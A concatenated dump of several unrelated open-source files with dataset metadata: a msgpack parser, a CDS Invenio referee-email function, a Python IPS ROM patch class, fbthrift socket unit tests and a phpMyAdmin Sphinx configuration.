def packedValue(self):
return self['type'].PackedValue()
class t_packet(pbinary.struct):
def __value(self):
return bit0.lookup(self['otherQ'])
_fields_ = [
(1, 'otherQ'),
(__value, 'value'),
]
def PackedType(self):
'''Return the msgpack type-id for the packet.'''
return self.__field__('value').PackedType()
def PackedValue(self):
'''Return the integer value encoded within the type field of the packet.'''
return self.__field__('value').PackedValue()
def summary(self):
res = d_packet.lookup(self.PackedType())
return '{:s} {:s}'.format(res.typename(), super(t_packet,self).summary())
## first bit : positive-fixint or other
@bit0.define
class t_positive_fixint(pbinary.integer):
type = 0
def blockbits(self): return 7
def PackedType(self): return 0b00000000
def PackedValue(self): return self.int()
@bit0.define
class t_fixother(pbinary.struct):
type = 1
def __value(self):
return bit1.lookup(self['groupQ'])
_fields_ = [
(1, 'groupQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## second bit : container or group
@bit1.define
class t_1fixcontainer(pbinary.struct):
type = 0
def __value(self):
return bit2container.lookup(self['strQ'])
_fields_ = [
(1, 'strQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
@bit1.define
class t_fixgroup(pbinary.struct):
type = 1
def __value(self):
return bit2msgtype.lookup(self['negative-fixintQ'])
_fields_ = [
(1, 'negative-fixintQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## third bit : str or array/map
@bit2container.define
class t_fixstr(pbinary.integer):
type = 1
def blockbits(self): return 5
def PackedType(self): return 0b10100000
def PackedValue(self): return self.int()
@bit2container.define
class t_2fixcontainer(pbinary.struct):
type = 0
def __container(self):
return bit3arraymap.lookup(self['arrayQ'])
_fields_ = [
(1, 'arrayQ'),
(__container, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## fourth bit: array or map
@bit3arraymap.define
class t_fixmap(pbinary.integer):
type = 0
def blockbits(self): return 4
def PackedType(self): return 0b10000000
def PackedValue(self): return self.int()
@bit3arraymap.define
class t_fixarray(pbinary.integer):
type = 1
def blockbits(self): return 4
def PackedType(self): return 0b10010000
def PackedValue(self): return self.int()
## third bit : negative-fixint or messagetype
@bit2msgtype.define
class t_negative_fixint(pbinary.integer):
type = 1
def blockbits(self): return 5
def PackedType(self): return 0b11100000
def PackedValue(self): return self.int()
@bit2msgtype.define
class t_message(pbinary.enum):
type, length = 0, 5
def PackedType(self): return (0b11 << 6) | self.int()
def PackedValue(self): raise NotImplementedError
_values_ = [
('nil', 0b00000),
('(neverused)', 0b00001),
('false', 0b00010),
('true', 0b00011),
('bin8', 0b00100),
('bin16', 0b00101),
('bin32', 0b00110),
('ext8', 0b00111),
('ext16', 0b01000),
('ext32', 0b01001),
('float32', 0b01010),
('float64', 0b01011),
('uint8', 0b01100),
('uint16', 0b01101),
('uint32', 0b01110),
('uint64', 0b01111),
('int8', 0b10000),
('int16', 0b10001),
('int32', 0b10010),
('int64', 0b10011),
('fixext1', 0b10100),
('fixext2', 0b10101),
('fixext4', 0b10110),
('fixext8', 0b10111),
('fixext16', 0b11000),
('str8', 0b11001),
('str16', 0b11010),
('str32', 0b11011),
('array16', 0b11100),
('array32', 0b11101),
('map16', 0b11110),
('map32', 0b11111),
]
### Message data types
class summaryStructure(pstruct.type):
def summary(self):
if len(self._fields_) > 1:
return super(summaryStructure, self).summary()
res = ('{:s}={:s}'.format(k, self[k].summary()) for _, k in self._fields_)
return '{{{:s}}}'.format(', '.join(res))
class ConstantHolder(ptype.block):
constant = None
def get(self):
return None
def set(self, value):
raise NotImplementedError
class PackedIntegerHolder(pint.uint_t):
def get(self):
return self.getparent(packet).packedValue()
def summary(self):
return '{integer:d} ({integer:+#x})'.format(integer=self.get())
def set(self, value):
pkt = self.getparent(packet)
leafs = pkt['type'].traverse(edges=lambda self: self.value, filter=lambda self: isinstance(self, pbinary.type) and self.bits() > 1)
res = list(leafs)[-1]
if res.name() != 'value':
raise AssertionError
return res.set(value)
@d_packet.define
class d_nil(summaryStructure):
type = 0b11000000
class _ConstantHolderNone(ConstantHolder): constant = None
_fields_ = [(_ConstantHolderNone, 'Value')]
@d_packet.define
class d_true(summaryStructure):
type = 0b11000010
class _ConstantHolderTrue(ConstantHolder): constant = True
_fields_ = [(_ConstantHolderTrue, 'Value')]
@d_packet.define
class d_false(summaryStructure):
type = 0b11000011
class _ConstantHolderFalse(ConstantHolder): constant = False
_fields_ = [(_ConstantHolderFalse, 'Value')]
@d_packet.define
class d_positive_fixint(summaryStructure):
type = 0b00000000
_fields_ = [(PackedIntegerHolder, 'Value')]
@d_packet.define
class d_negative_fixint(summaryStructure):
type = 0b11100000
class _PackedSignedIntegerHolder(PackedIntegerHolder):
def get(self):
return -0x20 + super(d_negative_fixint._PackedSignedIntegerHolder, self).get()
_fields_ = [(_PackedSignedIntegerHolder, 'Value')]
@d_packet.define
class d_uint8(summaryStructure):
type = 0b11001100
_fields_ = [(pint.uint8_t,'Value')]
@d_packet.define
class d_uint16(summaryStructure):
type = 0b11001101
_fields_ = [(pint.uint16_t,'Value')]
@d_packet.define
class d_uint32(summaryStructure):
type = 0b11001110
_fields_ = [(pint.uint32_t,'Value')]
@d_packet.define
class d_uint64(summaryStructure):
type = 0b11001111
_fields_ = [(pint.uint64_t,'Value')]
@d_packet.define
class d_int8(summaryStructure):
type = 0b11010000
_fields_ = [(pint.int8_t,'Value')]
@d_packet.define
class d_int16(pstruct.type):
type = 0b11010001
_fields_ = [(pint.int16_t,'Value')]
@d_packet.define
class d_int32(pstruct.type):
type = 0b11010010
_fields_ = [(pint.int32_t,'Value')]
@d_packet.define
class d_int64(pstruct.type):
type = 0b11010011
_fields_ = [(pint.int64_t,'Value')]
@d_packet.define
class d_float32(pstruct.type):
type = 0b11001010
_fields_ = [(pfloat.single,'Value')]
@d_packet.define
class d_float64(pstruct.type):
type = 0b11001011
_fields_ = [(pfloat.double,'Value')]
@d_packet.define
class d_fixstr(summaryStructure):
type = 0b10100000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str8(summaryStructure):
type = 0b11011001
_fields_ = [
(pint.uint8_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str16(summaryStructure):
type = 0b11011010
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str32(summaryStructure):
type = 0b11011011
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin8(summaryStructure):
type = 0b11000100
_fields_ = [
(pint.uint8_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin16(summaryStructure):
type = 0b11000101
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin32(summaryStructure):
type = 0b11000110
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_fixarray(summaryStructure):
type = 0b10010000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_array16(summaryStructure):
type = 0b11011100
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_array32(summaryStructure):
type = 0b11011101
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_fixmap(summaryStructure):
type = 0b10000000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
def Data(self):
p = self.getparent(packet)
return p['type'].PackedValue()
@d_packet.define
class d_map16(summaryStructure):
type = 0b11011110
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
@d_packet.define
class d_map32(summaryStructure):
type = 0b11011111
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
@d_packet.define
class d_fixext1(summaryStructure):
type = 0b11010100
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 1), 'Value'),
]
@d_packet.define
class d_fixext2(summaryStructure):
type = 0b11010101
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 2), 'Value'),
]
@d_packet.define
class d_fixext4(summaryStructure):
type = 0b11010110
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 4), 'Value'),
]
@d_packet.define
class d_fixext8(summaryStructure):
type = 0b11010111
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 8), 'Value'),
]
@d_packet.define
class d_fixext16(summaryStructure):
type = 0b11011000
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 16), 'Value'),
]
@d_packet.define
class d_ext8(summaryStructure):
type = 0b11000111
_fields_ = [(pint.uint8_t, 'Value'), (pint.sint8_t, 'Type')]
@d_packet.define
class d_ext16(summaryStructure):
type = 0b11001000
_fields_ = [(pint.uint16_t, 'Value'), (pint.sint8_t, 'Type')]
@d_packet.define
class d_ext32(summaryStructure):
type = 0b11001001
_fields_ = [(pint.uint32_t, 'Value'), (pint.sint8_t, 'Type')]
if __name__ == '__main__':
import types
import operator,functools,itertools
res = [130,196,4,116,121,112,101,196,7,119,111,114,107,101,114,115, 196,4,100,97,116,97,145,130,196,8,119,111,114,107,101,114,105,100, 196,5,115,116,100,46,49,196,5,115,108,111,116,115,160]
res = str().join(map(chr,res))
# https://github.com/msgpack/msgpack-python/blob/master/test/test_format.py
#res = b"\x96" b"\xde\x00\x00" b"\xde\x00\x01\xc0\xc2" b"\xde\x00\x02\xc0\xc2\xc3\xc2" b"\xdf\x00\x00\x00\x00" b"\xdf\x00\x00\x00\x01\xc0\xc2" b"\xdf\x00\x00\x00\x02\xc0\xc2\xc3\xc2"
_fixnum = res = b"\x92\x93\x00\x40\x7f\x93\xe0\xf0\xff"
_fixarray = res = b"\x92\x90\x91\x91\xc0"
_fixraw = res = b"\x94\xa0\xa1a\xa2bc\xa3def"
_fixmap = res = b"\x82\xc2\x81\xc0\xc0\xc3\x81\xc0\x80"
_unsignedint = res = b"\x99\xcc\x00\xcc\x80\xcc\xff\xcd\x00\x00\xcd\x80\x00" b"\xcd\xff\xff\xce\x00\x00\x00\x00\xce\x80\x00\x00\x00" b"\xce\xff\xff\xff\xff"
_signedint = res = b"\x99\xd0\x00\xd0\x80\xd0\xff\xd1\x00\x00\xd1\x80\x00" b"\xd1\xff\xff\xd2\x00\x00\x00\x00\xd2\x80\x00\x00\x00" b"\xd2\xff\xff\xff\xff"
_raw = res = b"\x96\xda\x00\x00\xda\x00\x01a\xda\x00\x02ab\xdb\x00\x00" b"\x00\x00\xdb\x00\x00\x00\x01a\xdb\x00\x00\x00\x02ab"
_array = res = b"\x96\xdc\x00\x00\xdc\x00\x01\xc0\xdc\x00\x02\xc2\xc3\xdd\x00" b"\x00\x00\x00\xdd\x00\x00\x00\x01\xc0\xdd\x00\x00\x00\x02" b"\xc2\xc3"
_map = res = b"\x96" b"\xde\x00\x00" b"\xde\x00\x01\xc0\xc2" b"\xde\x00\x02\xc0\xc2\xc3\xc2" b"\xdf\x00\x00\x00\x00" b"\xdf\x00\x00\x00\x01\xc0\xc2" b"\xdf\x00\x00\x00\x02\xc0\xc2\xc3\xc2"
x = packet(source=ptypes.prov.string(res))
x=x.l
|
bsd-2-clause
| -6,107,569,118,676,119,000
| 30.808314
| 193
| 0.618819
| false
| 2.872966
| false
| false
| false
|
lbjay/cds-invenio
|
modules/websubmit/lib/functions/Send_Request_For_Refereeing_Process.py
|
1
|
4816
|
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
## Description: function Send_Approval_Request
## This function sends an email to the referee asking him/her
## to approve/reject a document
## Author: T.Baron
## PARAMETERS: directory: parameter to the link manager program
## addressesDAM: address of the referee(s)
## categformatDAM: variable needed to extract the category
## of the document and use it to derive the
## address.
## authorfile: name of the file containing the author list
## titleFile: name of the file containing the title
import os
import re
from invenio.config import \
CFG_SITE_NAME, \
CFG_SITE_URL, \
CFG_SITE_SUPPORT_EMAIL
from invenio.access_control_admin import acc_get_role_users,acc_get_role_id
from invenio.websubmit_config import CFG_WEBSUBMIT_COPY_MAILS_TO_ADMIN
from invenio.mailutils import send_email
def Send_Request_For_Refereeing_Process(parameters, curdir, form, user_info=None):
global rn,sysno
# variables declaration
doctype = re.search(".*/([^/]*)/([^/]*)/[^/]*$",curdir).group(2)
FROMADDR = '%s Submission Engine <%s>' % (CFG_SITE_NAME,CFG_SITE_SUPPORT_EMAIL)
otheraddresses = parameters['addressesDAM']
categformat = parameters['categformatDAM']
# retrieve category
categformat = categformat.replace("<CATEG>","([^-]*)")
categs = re.match(categformat,rn)
if categs is not None:
category = categs.group(1)
else:
category = "unknown"
# create TI
if os.path.exists("%s/date" % curdir):
fp = open("%s/date" % curdir, "r")
date = fp.read()
fp.close()
else:
date = ""
if os.path.exists("%s/%s" % (curdir,parameters['titleFile'])):
fp = open("%s/%s" % (curdir,parameters['titleFile']),"r")
title = fp.read()
fp.close()
title = title.replace("\n","")
else:
title = ""
title += " - %s" % date
# create AU
if os.path.exists("%s/%s" % (curdir,parameters['authorfile'])):
fp = open("%s/%s" % (curdir,parameters['authorfile']), "r")
author = fp.read()
fp.close()
else:
author = ""
# we get the referee password
#sth = run_sql("SELECT access FROM sbmAPPROVAL WHERE rn=%s", (rn,))
#if len(sth) >0:
#access = sth[0][0]
# Build referee's email address
refereeaddress = ""
# Try to retrieve the publication committee chair's email from the role database
for user in acc_get_role_users(acc_get_role_id("pubcomchair_%s_%s" % (doctype,category))):
refereeaddress += user[1] + ","
# And if there are general referees
for user in acc_get_role_users(acc_get_role_id("pubcomchair_%s_*" % doctype)):
refereeaddress += user[1] + ","
refereeaddress = re.sub(",$","",refereeaddress)
# Creation of the mail for the referee
addresses = ""
if refereeaddress != "":
addresses = refereeaddress + ","
if otheraddresses != "":
addresses += otheraddresses
else:
addresses = re.sub(",$","",addresses)
title_referee = "Request for refereeing process of %s" % rn
mail_referee = "The document %s has been asked for refereing process to the %s Server..\nYour have to select an editorial board for it.\n\n" % (rn,CFG_SITE_NAME)
mail_referee +="Title: %s\n\nAuthor(s): %s\n\n" % (title,author)
mail_referee +="To access the document(s), select the file(s) from the location:<%s/record/%s/files/>\n\n" % (CFG_SITE_URL,sysno)
mail_referee +="To select an editorial board, you should go to this URL:\n<%s/publiline.py?doctype=%s&categ=%s&RN=%s>\n" % (CFG_SITE_URL,doctype,category,rn)
mail_referee +="---------------------------------------------\nBest regards.\nThe submission team.\n"
#Send mail to referee
send_email(FROMADDR, addresses, title_referee, mail_referee, copy_to_admin=CFG_WEBSUBMIT_COPY_MAILS_TO_ADMIN)
return ""
|
gpl-2.0
| 4,204,461,003,099,882,000
| 44.433962
| 165
| 0.630606
| false
| 3.505095
| false
| false
| false
|
theonlydude/RandomMetroidSolver
|
rom/ips.py
|
1
|
10520
|
import itertools
from utils.utils import range_union
# adapted from ips-util for python 3.2 (https://pypi.org/project/ips-util/)
class IPS_Patch(object):
def __init__(self, patchDict=None):
self.records = []
self.truncate_length = None
self.max_size = 0
if patchDict is not None:
for addr, data in patchDict.items():
byteData = bytearray(data)
self.add_record(addr, byteData)
def toDict(self):
ret = {}
for record in self.records:
if 'rle_count' in record:
ret[record['address']] = [int.from_bytes(record['data'],'little')]*record['rle_count']
else:
ret[record['address']] = [int(b) for b in record['data']]
return ret
@staticmethod
def load(filename):
loaded_patch = IPS_Patch()
with open(filename, 'rb') as file:
header = file.read(5)
if header != b'PATCH':
raise Exception('Not a valid IPS patch file!')
while True:
address_bytes = file.read(3)
if address_bytes == b'EOF':
break
address = int.from_bytes(address_bytes, byteorder='big')
length = int.from_bytes(file.read(2), byteorder='big')
rle_count = 0
if length == 0:
rle_count = int.from_bytes(file.read(2), byteorder='big')
length = 1
data = file.read(length)
if rle_count > 0:
loaded_patch.add_rle_record(address, data, rle_count)
else:
loaded_patch.add_record(address, data)
truncate_bytes = file.read(3)
if len(truncate_bytes) == 3:
loaded_patch.set_truncate_length(int.from_bytes(truncate_bytes, byteorder='big'))
return loaded_patch
@staticmethod
def create(original_data, patched_data):
# The heuristics for optimizing a patch were chosen with reference to
# the source code of Flips: https://github.com/Alcaro/Flips
patch = IPS_Patch()
run_in_progress = False
current_run_start = 0
current_run_data = bytearray()
runs = []
if len(original_data) > len(patched_data):
patch.set_truncate_length(len(patched_data))
original_data = original_data[:len(patched_data)]
elif len(original_data) < len(patched_data):
original_data += bytes([0] * (len(patched_data) - len(original_data)))
if original_data[-1] == 0 and patched_data[-1] == 0:
patch.add_record(len(patched_data) - 1, bytes([0]))
for index, (original, patched) in enumerate(zip(original_data, patched_data)):
if not run_in_progress:
if original != patched:
run_in_progress = True
current_run_start = index
current_run_data = bytearray([patched])
else:
if original == patched:
runs.append((current_run_start, current_run_data))
run_in_progress = False
else:
current_run_data.append(patched)
if run_in_progress:
runs.append((current_run_start, current_run_data))
for start, data in runs:
if start == int.from_bytes(b'EOF', byteorder='big'):
start -= 1
data = bytes([patched_data[start - 1]]) + data
grouped_byte_data = list([
{'val': key, 'count': sum(1 for _ in group), 'is_last': False}
for key,group in itertools.groupby(data)
])
grouped_byte_data[-1]['is_last'] = True
record_in_progress = bytearray()
pos = start
for group in grouped_byte_data:
if len(record_in_progress) > 0:
# We don't want to interrupt a record in progress with a new header unless
# this group is longer than two complete headers.
if group['count'] > 13:
patch.add_record(pos, record_in_progress)
pos += len(record_in_progress)
record_in_progress = bytearray()
patch.add_rle_record(pos, bytes([group['val']]), group['count'])
pos += group['count']
else:
record_in_progress += bytes([group['val']] * group['count'])
elif (group['count'] > 3 and group['is_last']) or group['count'] > 8:
# We benefit from making this an RLE record if the length is at least 8,
# or the length is at least 3 and we know it to be the last part of this diff.
# Make sure not to overflow the maximum length. Split it up if necessary.
remaining_length = group['count']
while remaining_length > 0xffff:
patch.add_rle_record(pos, bytes([group['val']]), 0xffff)
remaining_length -= 0xffff
pos += 0xffff
patch.add_rle_record(pos, bytes([group['val']]), remaining_length)
pos += remaining_length
else:
# Just begin a new standard record.
record_in_progress += bytes([group['val']] * group['count'])
if len(record_in_progress) > 0xffff:
patch.add_record(pos, record_in_progress[:0xffff])
record_in_progress = record_in_progress[0xffff:]
pos += 0xffff
# Finalize any record still in progress.
if len(record_in_progress) > 0:
patch.add_record(pos, record_in_progress)
return patch
def add_record(self, address, data):
if address == int.from_bytes(b'EOF', byteorder='big'):
raise RuntimeError('Start address {0:x} is invalid in the IPS format. Please shift your starting address back by one byte to avoid it.'.format(address))
if address > 0xffffff:
raise RuntimeError('Start address {0:x} is too large for the IPS format. Addresses must fit into 3 bytes.'.format(address))
if len(data) > 0xffff:
raise RuntimeError('Record with length {0} is too large for the IPS format. Records must be less than 65536 bytes.'.format(len(data)))
if len(data) == 0: # ignore empty records
return
record = {'address': address, 'data': data, 'size':len(data)}
self.appendRecord(record)
def add_rle_record(self, address, data, count):
if address == int.from_bytes(b'EOF', byteorder='big'):
raise RuntimeError('Start address {0:x} is invalid in the IPS format. Please shift your starting address back by one byte to avoid it.'.format(address))
if address > 0xffffff:
raise RuntimeError('Start address {0:x} is too large for the IPS format. Addresses must fit into 3 bytes.'.format(address))
if count > 0xffff:
raise RuntimeError('RLE record with length {0} is too large for the IPS format. RLE records must be less than 65536 bytes.'.format(count))
if len(data) != 1:
raise RuntimeError('Data for RLE record must be exactly one byte! Received {0}.'.format(data))
record = {'address': address, 'data': data, 'rle_count': count, 'size': count}
self.appendRecord(record)
def appendRecord(self, record):
sz = record['address'] + record['size']
if sz > self.max_size:
self.max_size = sz
self.records.append(record)
def set_truncate_length(self, truncate_length):
self.truncate_length = truncate_length
def encode(self):
encoded_bytes = bytearray()
encoded_bytes += 'PATCH'.encode('ascii')
for record in self.records:
encoded_bytes += record['address'].to_bytes(3, byteorder='big')
if 'rle_count' in record:
encoded_bytes += (0).to_bytes(2, byteorder='big')
encoded_bytes += record['rle_count'].to_bytes(2, byteorder='big')
else:
encoded_bytes += len(record['data']).to_bytes(2, byteorder='big')
encoded_bytes += record['data']
encoded_bytes += 'EOF'.encode('ascii')
if self.truncate_length is not None:
encoded_bytes += self.truncate_length.to_bytes(3, byteorder='big')
return encoded_bytes
# save patch into IPS file
def save(self, path):
with open(path, 'wb') as ipsFile:
ipsFile.write(self.encode())
# applies patch on an existing bytearray
def apply(self, in_data):
out_data = bytearray(in_data)
for record in self.records:
if record['address'] >= len(out_data):
out_data += bytes([0] * (record['address'] - len(out_data) + 1))
if 'rle_count' in record:
out_data[record['address'] : record['address'] + record['rle_count']] = b''.join([record['data']] * record['rle_count'])
else:
out_data[record['address'] : record['address'] + len(record['data'])] = record['data']
if self.truncate_length is not None:
out_data = out_data[:self.truncate_length]
return out_data
# applies patch on an opened file
def applyFile(self, handle):
for record in self.records:
handle.seek(record['address'])
if 'rle_count' in record:
handle.write(bytearray(b'').join([record['data']]) * record['rle_count'])
else:
handle.write(record['data'])
# appends an IPS_Patch on top of this one
def append(self, patch):
if patch.truncate_length is not None and (self.truncate_length is None or patch.truncate_length > self.truncate_length):
self.set_truncate_length(patch.truncate_length)
for record in patch.records:
if record['size'] > 0: # ignore empty records
self.appendRecord(record)
# gets address ranges written to by this patch
def getRanges(self):
def getRange(record):
return range(record['address'], record['address']+record['size'])
return range_union([getRange(record) for record in self.records])
|
gpl-3.0
| 8,996,946,439,968,728,000
| 42.114754
| 164
| 0.552471
| false
| 4.182903
| false
| false
| false
|
facebook/fbthrift
|
thrift/lib/py/transport/TSocketTest.py
|
1
|
5829
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import socket
import tempfile
import threading
import time
import unittest
import thrift.transport.TSocket as TSocket
import thrift.transport.TTransport as TTransport
class TSocketTest(unittest.TestCase):
def test_usage_as_context_manager(self):
"""
Asserts that both TSocket and TServerSocket can be used with `with` and
that their resources are disposed of at the close of the `with`.
"""
text = b"hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
self.assertFalse(conn.isOpen())
with server.accept() as client:
read = client.read(len(text))
self.assertFalse(conn.isOpen())
self.assertFalse(server.isListening())
self.assertEquals(read, text)
def test_server_context_errors(self):
# Make sure the TServerSocket context manager doesn't
# swallow exceptions
def do_test():
with TSocket.TServerSocket(port=0, family=socket.AF_INET6):
raise Exception('test_error')
self.assertRaisesRegexp(Exception, 'test_error', do_test)
def test_open_failure(self):
# Bind a server socket to an address, but don't actually listen on it.
server_socket = socket.socket(socket.AF_INET6)
try:
server_socket.bind(('::', 0))
server_port = server_socket.getsockname()[1]
# Explicitly use "localhost" as the hostname, so that the
# connect code will try both IPv6 and IPv4. We want to
# exercise the failure behavior when trying multiple addresses.
sock = TSocket.TSocket(host='localhost', port=server_port)
sock.setTimeout(50) # ms
try:
sock.open()
self.fail('unexpectedly succeeded to connect to closed socket')
except TTransport.TTransportException:
# sock.open() should not leave the file descriptor open
# when it fails
self.assertEquals(None, sock.handle)
self.assertEquals({}, sock.handles)
# Calling close() again on the socket should be a no-op,
# and shouldn't throw an error
sock.close()
finally:
server_socket.close()
def test_poller_process(self):
# Make sure that pollers do not fail when they're given None as timeout
text = "hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
def write_data():
# delay writing to verify that poller.process is waiting
time.sleep(1)
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
poller = TSocket.ConnectionSelect()
thread = threading.Thread(target=write_data)
thread.start()
for filenos in server.handles.keys():
poller.read(filenos)
r, _, x = poller.process(timeout=None)
thread.join()
# Verify that r is non-empty
self.assertTrue(r)
def test_deprecated_str_form_of_port(self):
# Make sure that the deprecated form of the `port` parameter is
# accepted in TServerSocket and TSocket.
port = "0"
text = b"hi" # sample text to send over the wire
# NB: unfortunately unittest.TestCase.assertWarns isn't available until
# py3.
with TSocket.TServerSocket(port=port, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=str(addr[1])) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
def test_bad_port(self):
port = 'bogus'
with self.assertRaises(ValueError):
with TSocket.TServerSocket(port=port):
pass
with self.assertRaises(ValueError):
with TSocket.TSocket(port=port):
pass
def test_unix_socket(self):
text = b"hi" # sample text to send over the wire
with tempfile.NamedTemporaryFile(delete=True) as fh:
unix_socket = fh.name
with TSocket.TServerSocket(unix_socket=unix_socket) as server:
with TSocket.TSocket(unix_socket=unix_socket) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
# The socket will not be cleaned up when the server has been shutdown.
self.assertTrue(os.path.exists(unix_socket))
|
apache-2.0
| 3,627,083,272,699,399,700
| 38.924658
| 82
| 0.614857
| false
| 4.251641
| true
| false
| false
|
hanoverhr/CAF
|
db/phpm/doc/conf.py
|
1
|
9670
|
# -*- coding: utf-8 -*-
#
# phpMyAdmin documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 26 14:04:48 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "_ext")))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['configext']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'phpMyAdmin'
copyright = u'2012 - 2014, The phpMyAdmin devel team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '4.3.1'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'html', 'doctrees']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
